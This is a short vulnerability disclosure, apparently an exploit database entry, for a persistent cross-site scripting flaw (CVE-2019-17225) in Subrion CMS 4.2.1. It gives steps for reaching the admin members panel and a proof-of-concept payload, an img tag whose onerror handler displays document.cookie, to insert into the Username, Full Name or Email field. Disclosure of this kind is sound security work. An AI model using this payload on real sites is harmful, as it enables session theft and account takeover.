Subrion version 4.2.1 suffers from a persistent cross site scripting vulnerability.
d7f2994dd53a0c5225363eb73f654e5dd91fac173e3590491f13210f45f3b788
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description : Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.
First login the panel with user credential, Go to member tag from left menu.
http://localhost/panel/members/
Username, Full Name, Email are editable with double click on it. Insert the
following payload
<img src=x onerror=alert(document.cookie)>